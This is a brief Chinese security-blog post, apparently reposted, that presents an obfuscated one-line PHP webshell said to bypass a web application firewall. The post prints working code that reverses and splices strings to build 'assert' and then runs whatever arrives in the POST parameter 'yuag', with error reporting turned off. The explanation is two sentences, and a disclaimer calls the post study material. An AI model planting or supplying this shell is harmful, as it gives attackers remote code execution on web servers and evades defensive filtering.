最新过某waf一句话
这个是我在互联网上看见的,其实和回调函数差不多,拿来分析一下吧。
error_reporting(0);
$b="zxczxczxczxczxcxzczx";
function yuag_array($b,$c){
$b=strrev($b);
array_map(substr_replace($b, 'ss', 1, 0),array($c));
}
yuag_array("trea",$_POST['yuag']);
?>
先是构造了一个函数yuag_array,然后传入了两个参数,经过反转和替换字符串构造出assert。
这样最后执行的就是:
array_map(assert,array($_POST['yuag']));
这里就不再做详细介绍了。
【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。
发表评论